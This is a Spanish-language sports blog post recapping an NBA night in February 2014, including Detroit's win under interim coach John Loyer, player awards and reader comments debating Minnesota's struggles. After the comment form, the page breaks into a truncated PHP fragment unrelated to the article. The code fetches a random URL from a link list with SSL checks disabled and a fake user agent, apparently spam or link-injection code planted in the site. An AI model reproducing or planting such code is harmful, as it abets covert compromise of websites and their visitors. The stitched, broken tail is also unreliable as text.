La Crónica: Debut triunfal en Detroit

11 de February de 2014 por Simon

Jornada muy poco emocionante. Sólo en la visita de los Pelicans a Canadá vimos a dos equipos que de verdad buscaron la victoria. Aún con idas y venidas el marcador del partido tuvo algo de emoción al menos. Tras un primer cuarto en el que Toronto parecía sentar las bases de lo que iba a ser una victoria por KO, los Pelicans, de la mano de los suplentes, conseguían reducir la ventaja y llegar al descanso con empate en el marcador. Como si de un reinicio de partido se tratara el tercer cuarto fue clavado al primero, con los Raptors logrando de nuevo ventajas superiores a la decena de puntos. En el último cuarto, los Pelicans volvieron a remontar pero esta vez no lograron ponerse por delante pues Lowry manejó el final del duelo a las mil maravillas (101-108). Otro partido que al menos tuvo algo de igualdad fue la visita de Boston al peor equipo de la liga, Milwaukee Bucks. La igualdad imperó en los tres primeros cuartos pero en el último los Celtics, con Jeff Green como gran protagonista, no dieron ninguna opción a los Bucks y ganaron el partido con autoridad (102-86). 

Lo más destacado de la jornada terminó siendo el debut como entrenador interino de los Pistons de John Loyer. Los Pistons aprovecharon el mal momento que atraviesan los Spurs debido a las bajas para sumar su tercera victoria consecutiva y empatar con los Bobcats en la octava plaza del Este. Detroit aprovechó las numerosas pérdidas de San Antonio para lograr una alta cantidad de puntos fáciles que le otorgaron ventajas superiores a los 20 puntos. Los Spurs, fatal toda la noche, sólo consiguieron maquillar el resultado en el último cuarto (100-109). No todo está perdido en Detroit aún.  Otro equipo que está siendo castigado en las últimas fechas con numerosas bajas son los Timberwolves. Ayer sin Pekovic ni Martin no fueron capaces de plantar cara a Houston Rockets que sin hacer ruido siguen sumando victorias y cada vez recortan más diferencias a Portland y San Antonio. Chandler Parsons y Dwight Howard fueron los que lideraron la victoria de unos Rockets que apenas encontraron rival en los momentos de genialidad que tenía Kevin Love. En el último cuarto Love se quedó sin gasolina y los Rockets aprovecharon esta circunstancia para cerrar el partido con un gran último parcial (107-89).

Si Indiana tiene un pabellón maldito ese es sin duda el Pepsi Center de Denver. Ayer, aprovechando que jugaban en su casa y no en Denver, propinaron un severo correctivo a los Nuggets con aroma a venganza. Los visitantes simplemente se dedicaron a verlas venir porque no pudieron hacer nada ante el vendaval que fueron los Pacers anoche (80-109). Más vergonzoso aún fue ver a los Sixers, que encima repitieron paliza. Si la jornada anterior habían perdido de 45 ante los Clippers ayer lo hicieron de 43 en el Oracle y gracias a que los hombres de Mark Jackson no quisieron hacer mucha sangre pues al descanso la diferencia era ya de 33 puntos (80-123). Philadelphia ha ido desinflándose con el paso de la temporada y la versión del último mes cuadra más con lo que esperábamos de ellos a principio de curso.

PREMIOS

MVP: Marreese Speights se dio un atracón con los Sixers. Anotó 32 puntos (12 de 15), cogió 8 rebotes y puso 3 tapones ¡en solo 27 minutos! Desde 1991 (cuando Chris Mullin anotó 32 puntos en 26 minutos) los Warriors no veían algo parecido.

Rookie: Buen partido de Kelly Olynyk. 14 puntos, 11 rebotes y 3 asistencias en 21 minutos.

Sorpresa: Además de la de Speights, hay que destacar la actuación de su compañero Draymond Green (11 puntos, 11 rebotes y 3 tapones) y la del enmascarado Pattrick Patterson (22 puntos y 6 rebotes). Ambos aprovechando la titularidad.

Decepción: Entre Thaddeus Young y Spencer Hawes anotaron 18 puntos con un 8 de 25 en tiros de campo. De todas maneras el premio ha de ser global. Hacía muchos años que un equipo no perdía dos partidos consecutivos por más de 40 puntos…

Esfuerzo en vano: Aparecen rumores de traspaso para Tyreke Evans pero el ex de los Kings fue el mejor de los suyos ante los Raptors. Acabó el partido con 23 puntos, 5 rebotes, 10 asistencias y 3 robos. Cuando está bien es una delicia de jugador.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

8 comentarios a esta entrada

  1. futurman dice:
    #1

    Soy yo, ¿o Minesota es el equipo más aburrido de la temporada? Es que, vale que pierdan, pero no saben meter una cochina canasta. Normal que Love se vaya a pirar espantado cuando pueda.

      Citar

  2. Esteban dice:
    #2

    Fracaso tremendo el de minesota, me suena q no va a quedar nadie dentro de poco

    Love se va a ir, y a martin por ese precio alguien lo va a comprar, lo mismo para brewer

    No se enojen, pero muy decepcionante lo de ricky y lo de pekovic, y sobretodo lo de adelman

      Citar

  3. Ruxixon dice:
    #3

    Yo diría que no son un equipo aburrido,si no un equipo que no transmite nada,algo que viniendo de donde vienen es decir mucho.Sobre Minnesota ya está todo dicho aquí en el blog,cada uno con sus filias y fobias.Hoy me atreveré a decir que nadie hace nada por mejorar la marcha del equipo (ahora mismo Love me parece un hacenúmeros,sin culparle a él de la situación del equipo) y que es crónica de una muerte anunciada.

      Citar

  4. Esteban dice:
    #4

    Ruxixon:
    Yo diría que no son un equipo aburrido,si no un equipo que no transmite nada,algo que viniendo de donde vienen es decir mucho.Sobre Minnesota ya está todo dicho aquí en el blog,cada uno con sus filias y fobias.Hoy me atreveré a decir que nadie hace nada por mejorar la marcha del equipo (ahora mismo Love me parece un hacenúmeros,sin culparle a él de la situación del equipo) y que es crónica de una muerte anunciada.

    creo que es injusto darle el rotulo de “hacenumeros” a Love, cuando sin duda es el unico que intenta mantener a flote el equipo, y dado su nivel, no me queda ninguna duda que podria tener casi los mismos numeros en mejores equipos o contendientes

    recordemos que Pau tambien jugaba en unos malos Grizzlies que no ganaron nunca un partido de PO y cuando paso a los lakers demostró que no era un hace números, lo mismo puede pasar con Love si cae en los propios Lakers o en un equipo que tenga un nivel algo mejor

    cual es el problema de minesota? este año es difícil de explicar las lesiones los han respetado, tienen al fin un escolta puro como martin (y no un Ridnour improvisado), un ala pivote all-star, un centro supuestamente de garantías, un jugador valido como brewer, un base suplente con cartel como Barea

    vamos que la banca es mala, pero para tanto? a 7 partidos de PO?

      Citar

  5. Jose Luis dice:
    #5

    El problema de Minnesota es que van 3-13 en partidos definidos en el último minuto por 3 puntos o menos.

    Y las lesiones les han respetado? Para nada. Cuando no cae uno, cae otro. Pekovic, Love, Budinger, Martin…

      Citar

  6. Esteban dice:
    #6

    Jose Luis:
    Y las lesiones les han respetado? Para nada. Cuando no cae uno, cae otro. Pekovic, Love, Budinger, Martin…

    no comparto, si bien han tenido lesionados, COMO TODOS EN LA LIGA, no han perdido a love, ni a rubio, ni a martin ni a brewer, es decir su equipo titular casi completo,
    han ganado solo dos juegos mas que los Pelicans, a quienes les ha faltado todo el curso practicamente anderson y smith, muchisimos partidos davis y holiday, es decir, casi nunca han podido poner su cinco inicial,

    me parece que las lesiones han respetado mucho mas a los Wolves que a varios otros equipos, ni hablar de los Lakers, Nets, Knicks, Hwaks sin Horford, Bulls sin Rose, Thunder sin westbrook,

    al menos los wolves no han perdido a su jugador estrella

      Citar

  7. Vader dice:
    #7

    En mi opinión el problema de los Wolves es que es un equipo muy poco físico en una NBA cada vez más física. Sus dos jugadores interiores no intimidan, Ricky y Martin no son superiores físicamente y en el puesto de alero Kirilenko les iba muy bien. Creo que el traspaso de Williams por Mbah a Moute iba en parte para corregir ese déficit de falta de “talento físico” en el equipo pero supongo que a Adelman no le sale poner a un jugador tan limitado en ataque.

    Saludos

      Citar

  8. rumbero dice:
    #8

    Los últimos cuartos de los Wolves cuando se están jugando un partido son un drama como dice Jose Luis. Por ahí viene su mayor problema (entre muchos). Uno compara alguno de los 1º cuartos que se marcan con los últimos y no son el mismo equipo. Llegado ese momento no saben competir, su defensa que ya no es ninguna maravilla pasa a ser una broma y no meten una. Creo que ahí hay palos para todos. Ricky no mete una y eso provoca que pase sentado en el banquillo muchos finales de partido con lo que conlleva tener defendiendo el perímetro a Barea y Martin. Más la defensa de los interiores que con números en la mano es una de las peores de toda la liga. Y Adelman con sus cosas también, como ese amor incondicional por Shved con la temporada que está haciendo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>